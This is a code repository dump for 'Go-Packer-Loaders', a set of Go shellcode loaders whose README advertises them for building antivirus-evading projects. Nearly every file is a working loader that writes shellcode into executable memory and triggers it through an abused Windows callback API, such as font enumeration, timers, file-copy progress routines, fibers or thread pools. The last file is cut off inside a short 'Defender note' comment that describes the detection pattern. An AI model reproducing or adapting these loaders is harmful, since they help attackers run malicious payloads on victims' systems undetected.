| RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | if err != nil && err.Error() != "The operation completed successfully." 
{ 32 | syscall.Exit(0) 33 | } 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | dc, _, _ := GetDC.Call(0) 36 | EnumFontFamiliesExW.Call(dc, (uintptr)(unsafe.Pointer(&dc)), addr, 0, 0) 37 | } 38 | -------------------------------------------------------------------------------- /pkg/SymEnumProcesses/SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | FALSE = 0 17 | ) 18 | 19 | var ( 20 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 21 | ntdll = syscall.MustLoadDLL("ntdll.dll") 22 | Dbghelp = syscall.MustLoadDLL("Dbghelp.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 25 | SymInitialize = Dbghelp.MustFindProc("SymInitialize") 26 | SymEnumProcesses = Dbghelp.MustFindProc("SymEnumProcesses") 27 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 28 | ) 29 | 30 | func Callback(shellcode []byte) { 31 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 32 | if err != nil && err.Error() != "The operation completed successfully." 
{ 33 | syscall.Exit(0) 34 | } 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | Proces, _, _ := GetCurrentProcess.Call() 37 | SymInitialize.Call(Proces, 0, FALSE) 38 | SymEnumProcesses.Call(addr, 0) 39 | } 40 | -------------------------------------------------------------------------------- /pkg/EnumDesktopWindows/EnumDesktopWindows.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | User32 = syscall.MustLoadDLL("User32.dll") 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | GetCurrentThreadId = kernel32.MustFindProc("GetCurrentThreadId") 24 | EnumDesktopWindows = User32.MustFindProc("EnumDesktopWindows") 25 | GetThreadDesktop = User32.MustFindProc("GetThreadDesktop") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | if err != nil && err.Error() != "The operation completed successfully." 
{ 32 | syscall.Exit(0) 33 | } 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | 36 | Thr, _, _ := GetCurrentThreadId.Call() 37 | ThrD, _, _ := GetThreadDesktop.Call(Thr) 38 | 39 | EnumDesktopWindows.Call(ThrD, addr, 0) 40 | } 41 | -------------------------------------------------------------------------------- /pkg/SetTimer/SetTimer.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | g_InitOnce [0]byte 10 | lpContext [0]byte 11 | ) 12 | 13 | type MSG struct { 14 | } 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | NULL = 0 21 | dummy = 0 22 | ) 23 | 24 | var ( 25 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 26 | ntdll = syscall.MustLoadDLL("ntdll.dll") 27 | User32 = syscall.MustLoadDLL("User32.dll") 28 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 29 | SetTimer = User32.MustFindProc("SetTimer") 30 | GetMessageW = User32.MustFindProc("GetMessageW") 31 | DispatchMessageW = User32.MustFindProc("DispatchMessageW") 32 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 33 | ) 34 | 35 | func Callback(shellcode []byte) { 36 | 37 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 38 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 39 | msg := MSG{} 40 | SetTimer.Call(NULL, dummy, NULL, addr) 41 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 42 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 43 | } 44 | -------------------------------------------------------------------------------- /pkg/SysEnumSourceFiles/SysEnumSourceFiles.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "golang.org/x/sys/windows" 5 | "syscall" 6 | "unsafe" 7 
| ) 8 | 9 | var ( 10 | dummy [256]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | TRUE = 1 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | Dbghelp = syscall.MustLoadDLL("Dbghelp.dll") 25 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 26 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 27 | SymInitialize = Dbghelp.MustFindProc("SymInitialize") 28 | SymEnumSourceFiles = Dbghelp.MustFindProc("SymEnumSourceFiles") 29 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | hProcess := windows.CurrentProcess() 36 | SymInitialize.Call(uintptr(unsafe.Pointer(&hProcess)), NULL, TRUE) 37 | SymEnumSourceFiles.Call(uintptr(unsafe.Pointer(&hProcess)), NULL, NULL, addr, NULL) 38 | } 39 | -------------------------------------------------------------------------------- /pkg/EnumDesktopW/EnumDesktopW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "time" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | CAL_SMONTHNAME1 = 0x00000015 18 | ENUM_ALL_CALENDARS = 0xffffffff 19 | SORT_DEFAULT = 0x0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 24 | ntdll = syscall.MustLoadDLL("ntdll.dll") 25 | User32 = syscall.MustLoadDLL("User32.dll") 26 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 27 | EnumDesktopsW = User32.MustFindProc("EnumDesktopsW") 28 | GetProcessWindowStation = 
User32.MustFindProc("GetProcessWindowStation") 29 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." { 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | Process, _, _ := GetProcessWindowStation.Call() 39 | EnumDesktopsW.Call(Process, addr, 0) 40 | time.Sleep(10000) 41 | } 42 | -------------------------------------------------------------------------------- /pkg/CopyFileEx/CopyFileEx.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | const ( 9 | MEM_COMMIT = 0x1000 10 | MEM_RESERVE = 0x2000 11 | PAGE_EXECUTE_READWRITE = 0x40 12 | COPY_FILE_FAIL_IF_EXISTS = 0x00000001 13 | FALSE = 0 14 | ) 15 | 16 | var ( 17 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 18 | ntdll = syscall.MustLoadDLL("ntdll.dll") 19 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 20 | DeleteFileW = kernel32.MustFindProc("DeleteFileW") 21 | CopyFileExW = kernel32.MustFindProc("CopyFileExW") 22 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 23 | ) 24 | 25 | func Callback(shellcode []byte) { 26 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 27 | if err != nil && err.Error() != "The operation completed successfully." 
{ 28 | syscall.Exit(0) 29 | } 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 31 | 32 | p1, _ := syscall.UTF16PtrFromString("C:\\Windows\\Temp\\backup.log\\0") 33 | p2, _ := syscall.UTF16PtrFromString("C:\\Windows\\DirectX.log") 34 | p3, _ := syscall.UTF16PtrFromString("C:\\Windows\\Temp\\backup.log") 35 | 36 | DeleteFileW.Call(uintptr(unsafe.Pointer(p1))) 37 | CopyFileExW.Call( 38 | uintptr(unsafe.Pointer(p2)), 39 | uintptr(unsafe.Pointer(p3)), 40 | addr, 41 | 0, 42 | FALSE, COPY_FILE_FAIL_IF_EXISTS) 43 | } 44 | -------------------------------------------------------------------------------- /pkg/EnumDirTreeW/EnumDirTreeW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | dummy [522]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | TRUE = 1 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | Dbghelp = syscall.MustLoadDLL("Dbghelp.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 26 | SymInitialize = Dbghelp.MustFindProc("SymInitialize") 27 | EnumDirTreeW = Dbghelp.MustFindProc("EnumDirTreeW") 28 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | if err != nil && err.Error() != "The operation completed successfully." 
{ 34 | syscall.Exit(0) 35 | } 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | Process, _, _ := GetCurrentProcess.Call() 38 | SymInitialize.Call(Process, 0, TRUE) 39 | p1, _ := syscall.UTF16PtrFromString("C:\\\\Windows") 40 | p2, _ := syscall.UTF16PtrFromString("*.log") 41 | EnumDirTreeW.Call(Process, (uintptr)(unsafe.Pointer(p1)), (uintptr)(unsafe.Pointer(p2)), (uintptr)(unsafe.Pointer(&dummy)), addr, 0) 42 | } 43 | -------------------------------------------------------------------------------- /pkg/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | TRUE = 1 17 | FALSE = 0 18 | INFINITE = 0xFFFFFFFF 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | CreateTimerQueue = kernel32.MustFindProc("CreateTimerQueue") 26 | CreateEventW = kernel32.MustFindProc("CreateEventW") 27 | WaitForSingleObject = kernel32.MustFindProc("WaitForSingleObject") 28 | CreateTimerQueueTimer = kernel32.MustFindProc("CreateTimerQueueTimer") 29 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." 
{ 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | queue, _, _ := CreateTimerQueue.Call() 39 | gDoneEvent, _, _ := CreateEventW.Call(0, TRUE, FALSE, 0) 40 | CreateTimerQueueTimer.Call((uintptr)(unsafe.Pointer(&timer)), queue, addr, 0, 100, 0, 0) 41 | WaitForSingleObject.Call(gDoneEvent, INFINITE) 42 | } 43 | -------------------------------------------------------------------------------- /pkg/FiberContextEdit/FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | g_InitOnce [0]byte 12 | lpContext [0]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 24 | ntdll = syscall.MustLoadDLL("ntdll.dll") 25 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 26 | CreateFiber = kernel32.MustFindProc("CreateFiber") 27 | SwitchToFiber = kernel32.MustFindProc("SwitchToFiber") 28 | ConvertThreadToFiber = kernel32.MustFindProc("ConvertThreadToFiber") 29 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 30 | ) 31 | 32 | func dummy() { 33 | var age string 34 | fmt.Scanln(&age) 35 | } 36 | 37 | func Callback(shellcode []byte) { 38 | var d func() 39 | d = dummy 40 | ConvertThreadToFiber.Call(NULL) 41 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 42 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 43 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 44 | if lpFiber == NULL { 45 | fmt.Printf("GLE : %d\n", err1) 46 | os.Exit(0) 47 | } 48 | 49 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 50 | *tgtFuncAddr = addr 51 | 
fmt.Println(tgtFuncAddr) 52 | SwitchToFiber.Call(lpFiber) 53 | } 54 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Go-Packer-Loaders 2 | 帮你快速Go建你的免杀项目 3 | 4 | 5 | # Example 6 | ``` 7 | package main 8 | 9 | import ( 10 | "encoding/base64" 11 | "fmt" 12 | Loaders "github.com/ImCoriander/Go-Packer-Loaders/pkg/EnumPwrSchemes" 13 | 14 | ) 15 | 16 | // =================加密=============== 17 | var BaseStr = "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" 18 | 19 | //=================加密=============== 20 | 21 | func main() { 22 | 23 | // 解码base64字符串 24 | data, err := base64.StdEncoding.DecodeString(BaseStr) 25 | if err != nil { 26 | fmt.Println("解码失败:", err) 27 | return 28 | } 29 | Loaders.Callback(data) 30 | 31 | } 32 | 33 | ``` 34 | 35 | 36 | # Help 37 | 38 | ## 一、初始化环境 39 | ``` 40 | go mod init main 41 | ``` 42 | ``` 43 | go mod tidy 44 | ``` 45 | 46 | ## 二、在项目中选择加载方式 47 | 例如上文提到:EnumPwrSchemes,如果需要用其他的加载方式,可直接更换名字!!! 
48 | -------------------------------------------------------------------------------- /pkg/LdrpCallInitRoutine/LdrpCallInitRoutine.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | g_InitOnce [0]byte 10 | lpContext [0]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | NTDLL_LDRPCALLINITRT_OFFSET = 0x000199bc 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | GetModuleHandleW = kernel32.MustFindProc("GetModuleHandleW") 26 | GetProcAddress = kernel32.MustFindProc("GetProcAddress") 27 | GetModuleHandleA = kernel32.MustFindProc("GetModuleHandleA") 28 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 29 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 30 | ) 31 | 32 | type lpCallInitRoutine func(size_t uintptr, size_t1 uintptr, size_t2 uintptr) uintptr 33 | type pLdrpCallInitRoutine func(lpCallInitRoutine, size_t1, uint32, size_t uintptr) byte 34 | 35 | func Callback(shellcode []byte) { 36 | GetCurrentProcess.Call() 37 | 38 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 39 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 40 | 41 | hNtdll, _ := syscall.LoadLibrary("ntdll") 42 | LdrpCallInitRoutine := (*pLdrpCallInitRoutine)(unsafe.Pointer(uintptr(hNtdll) + NTDLL_LDRPCALLINITRT_OFFSET)) 43 | syscall.SyscallN(uintptr(unsafe.Pointer(LdrpCallInitRoutine)), 4, addr, 0, 0, 0) 44 | } 45 | -------------------------------------------------------------------------------- /pkg/ImageGetDigestStream/ImageGetDigestStream.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 
| 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | dummy int 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO = 0x04 17 | GENERIC_READ = 0x80000000 18 | FILE_SHARE_READ = 0x00000001 19 | OPEN_EXISTING = 3 20 | FILE_ATTRIBUTE_NORMAL = 0x00000080 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 25 | ntdll = syscall.MustLoadDLL("ntdll.dll") 26 | Imagehlp = syscall.MustLoadDLL("Imagehlp.dll") 27 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 28 | CreateFileW = kernel32.MustFindProc("CreateFileW") 29 | CloseHandle = kernel32.MustFindProc("CloseHandle") 30 | ImageGetDigestStream = Imagehlp.MustFindProc("ImageGetDigestStream") 31 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | p1, _ := syscall.UTF16PtrFromString("C:\\Windows\\System32\\ntdll.dll") 38 | hImg, err1, err2 := CreateFileW.Call(uintptr(unsafe.Pointer(p1)), 39 | GENERIC_READ, FILE_SHARE_READ, 40 | 0, 41 | OPEN_EXISTING, 42 | FILE_ATTRIBUTE_NORMAL, 43 | 0) 44 | ImageGetDigestStream.Call(hImg, CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO, addr, (uintptr)(unsafe.Pointer(&dummy))) 45 | CloseHandle.Call((uintptr)(unsafe.Pointer(&dummy))) 46 | } 47 | -------------------------------------------------------------------------------- /pkg/CopyFile2/CopyFile2.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | type Copyfile2ExtendedParameters struct { 9 | dwSize *Copyfile2ExtendedParameters 10 | dwCopyFlags int 11 | pfCancel bool 12 | pProgressRoutine uintptr 13 | pvCallbackContext int 14 | } 15 | 16 | 
const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | COPY_FILE_FAIL_IF_EXISTS = 0x00000001 21 | ) 22 | 23 | var ( 24 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 25 | ntdll = syscall.MustLoadDLL("ntdll.dll") 26 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 27 | DeleteFileW = kernel32.MustFindProc("DeleteFileW") 28 | CopyFile2 = kernel32.MustFindProc("CopyFile2") 29 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." { 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | 39 | params := &Copyfile2ExtendedParameters{} 40 | params.dwSize = params 41 | params.dwCopyFlags = COPY_FILE_FAIL_IF_EXISTS 42 | params.pfCancel = false 43 | params.pProgressRoutine = addr 44 | params.pvCallbackContext = 0 45 | 46 | p1, _ := syscall.UTF16PtrFromString("C:\\Windows\\Temp\\backup.log") 47 | p2, _ := syscall.UTF16PtrFromString("C:\\Windows\\DirectX.log") 48 | p3, _ := syscall.UTF16PtrFromString("C:\\Windows\\Temp\\backup.log") 49 | 50 | DeleteFileW.Call(uintptr(unsafe.Pointer(p1))) 51 | CopyFile2.Call(uintptr(unsafe.Pointer(p2)), uintptr(unsafe.Pointer(p3)), (uintptr)(unsafe.Pointer(¶ms))) 52 | } 53 | -------------------------------------------------------------------------------- /pkg/RtlUserFiberStart/RtlUserFiberStart.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "fmt" 5 | "golang.org/x/sys/windows" 6 | "log" 7 | "syscall" 8 | "unsafe" 9 | ) 10 | 11 | var ( 12 | g_InitOnce [0]byte 13 | lpContext [0]byte 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | 
TEB_FIBERDATA_PTR_OFFSET = 0x17ee 21 | HEAP_ZERO_MEMORY = 0x00000008 22 | ) 23 | 24 | var ( 25 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 26 | ntdll = syscall.MustLoadDLL("ntdll.dll") 27 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 28 | HeapAlloc = kernel32.MustFindProc("HeapAlloc") 29 | GetProcessHeap = kernel32.MustFindProc("GetProcessHeap") 30 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | hNtdll, err := windows.LoadLibrary("ntdll") 35 | if err != nil { 36 | log.Fatal(err) 37 | } 38 | RtlUserFiberStart, err1 := windows.GetProcAddress(hNtdll, "RtlUserFiberStart") 39 | if err1 != nil { 40 | log.Fatal(err1) 41 | } 42 | NtCurrentTeb, err2 := windows.GetProcAddress(hNtdll, "NtCurrentTeb") 43 | if err2 != nil { 44 | log.Fatal(err2) 45 | } 46 | teb, _, _ := syscall.SyscallN(NtCurrentTeb, 0) 47 | pTebFlags := teb + TEB_FIBERDATA_PTR_OFFSET 48 | pTebFlags1 := *(*int)(unsafe.Pointer(&pTebFlags)) | 0b100 49 | fmt.Println(pTebFlags1) 50 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE) 51 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 52 | p1, _, _ := GetProcessHeap.Call() 53 | lpDummyFiberData, _, _ := HeapAlloc.Call(p1, HEAP_ZERO_MEMORY, 0x100) 54 | p2 := (*uintptr)(unsafe.Pointer(lpDummyFiberData + 0x0a8)) 55 | *p2 = addr 56 | syscall.SyscallN(RtlUserFiberStart, 0) 57 | } 58 | -------------------------------------------------------------------------------- /pkg/CreateThreadPoolWait/CreateThreadPoolWait.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "time" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | old int 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | LEN = 277 18 | FALSE = 0 19 | ) 20 | 21 | var ( 22 | kernel32 = 
syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | CreateEventW = kernel32.MustFindProc("CreateEventW") 26 | VirtualProtect = kernel32.MustFindProc("VirtualProtect") 27 | SetThreadpoolWait = kernel32.MustFindProc("SetThreadpoolWait") 28 | CreateThreadpoolWait = kernel32.MustFindProc("CreateThreadpoolWait") 29 | SetEvent = kernel32.MustFindProc("SetEvent") 30 | WaitForThreadpoolWaitCallbacks = kernel32.MustFindProc("WaitForThreadpoolWaitCallbacks") 31 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 32 | ) 33 | 34 | func Callback(shellcode []byte) { 35 | hEvent, _, _ := CreateEventW.Call(0, 0, 0, 0) 36 | 37 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 38 | if err != nil && err.Error() != "The operation completed successfully." { 39 | syscall.Exit(0) 40 | } 41 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 42 | //VirtualProtect.Call(addr, LEN, windows.PAGE_EXECUTE_READ, (uintptr)(unsafe.Pointer(&old))) 43 | ptp_w, _, _ := CreateThreadpoolWait.Call(addr, 0, 0) 44 | SetThreadpoolWait.Call(ptp_w, hEvent, 0) 45 | SetEvent.Call(hEvent) 46 | WaitForThreadpoolWaitCallbacks.Call(ptp_w, FALSE) 47 | SetEvent.Call(hEvent) 48 | for { 49 | time.Sleep(9000) 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /pkg/SetupCommitFileQueueW/SetupCommitFileQueueW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | g_InitOnce [0]byte 10 | lpContext [0]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | SP_COPY_NOSKIP = 0x0000400 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = 
syscall.MustLoadDLL("ntdll.dll")
24 | Setupapi = syscall.MustLoadDLL("Setupapi.dll")
25 | User32 = syscall.MustLoadDLL("User32.dll")
26 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
27 | SetupOpenFileQueue = Setupapi.MustFindProc("SetupOpenFileQueue")
28 | SetupQueueCopyW = Setupapi.MustFindProc("SetupQueueCopyW")
29 | SetupCommitFileQueueW = Setupapi.MustFindProc("SetupCommitFileQueueW")
30 | GetTopWindow = User32.MustFindProc("GetTopWindow")
31 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory")
32 | )
33 |
// Callback copies the supplied bytes into a freshly allocated RWX region and
// passes that address to SetupCommitFileQueueW in its message-handler
// (callback) position, so the Setup API transfers control to the buffer while
// committing the queue.
//
// Defender note: a private PAGE_EXECUTE_READWRITE allocation that is written
// once and then handed to a system API as a function pointer is the generic
// "callback execution" pattern. Executable private memory not backed by an
